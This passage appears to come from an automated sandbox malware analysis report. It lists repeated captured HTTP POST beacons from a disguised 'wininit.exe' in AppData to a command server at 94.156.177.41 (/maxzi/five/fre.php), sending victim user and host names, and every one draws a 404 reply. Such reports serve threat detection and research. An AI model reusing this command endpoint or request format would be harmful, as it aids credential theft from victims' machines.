                                                Nov 20, 2024 10:12:58.994067907 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:59.717789888 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:59 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                90192.168.2.224925894.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:59.851802111 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:59.856694937 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:13:00.715209007 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:13:00 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                91192.168.2.224925994.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:13:00.854696035 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:13:00.859620094 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:13:01.604186058 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:13:01 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                92192.168.2.224926094.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:13:01.802095890 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:13:01.807106018 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:13:02.699595928 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:13:02 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                93192.168.2.224926194.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:13:02.860096931 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:13:02.864989996 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:13:03.729377031 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:13:03 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                94192.168.2.224926294.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:13:03.877337933 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:13:03.882271051 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:13:04.648056984 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:13:04 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                95192.168.2.224926394.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:13:04.782109022 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:13:04.788702965 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:13:05.554836035 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:13:05 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                96192.168.2.224926494.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:13:05.702789068 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:13:05.710359097 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:13:06.563930035 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:13:06 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                97192.168.2.224926594.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:13:06.709011078 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:13:06.715979099 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:13:07.564760923 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:13:07 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                98192.168.2.224926694.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:13:07.719913006 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:13:07.728341103 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:13:08.449316978 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:13:08 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                99192.168.2.224926794.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:13:08.590316057 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:13:08.595685959 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:13:09.331041098 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:13:09 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                100192.168.2.224926894.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:13:09.476685047 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:13:09.484579086 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:13:10.215668917 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:13:10 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                101192.168.2.224926994.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:13:10.355726957 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:13:10.364041090 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:13:11.234061956 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:13:11 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                102192.168.2.224927094.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:13:11.377935886 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:13:11.382962942 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:13:12.128077984 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:13:12 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                103192.168.2.224927194.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:13:12.267328978 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:13:12.272453070 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:13:13.149569035 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:13:13 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                104192.168.2.224927294.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:13:13.284693003 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:13:13.292586088 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:13:14.047805071 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:13:13 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                105192.168.2.224927394.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:13:14.186636925 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:13:14.191870928 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:13:14.920927048 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:13:14 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                106192.168.2.224927494.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:13:15.060734987 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:13:15.065941095 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:13:15.927126884 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:13:15 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                107192.168.2.224927594.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:13:16.074276924 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:13:16.079240084 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:13:16.829201937 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:13:16 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                108192.168.2.224927694.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:13:17.009215117 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:13:17.017319918 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:13:17.903618097 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:13:17 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                109192.168.2.224927794.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:13:18.051748037 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
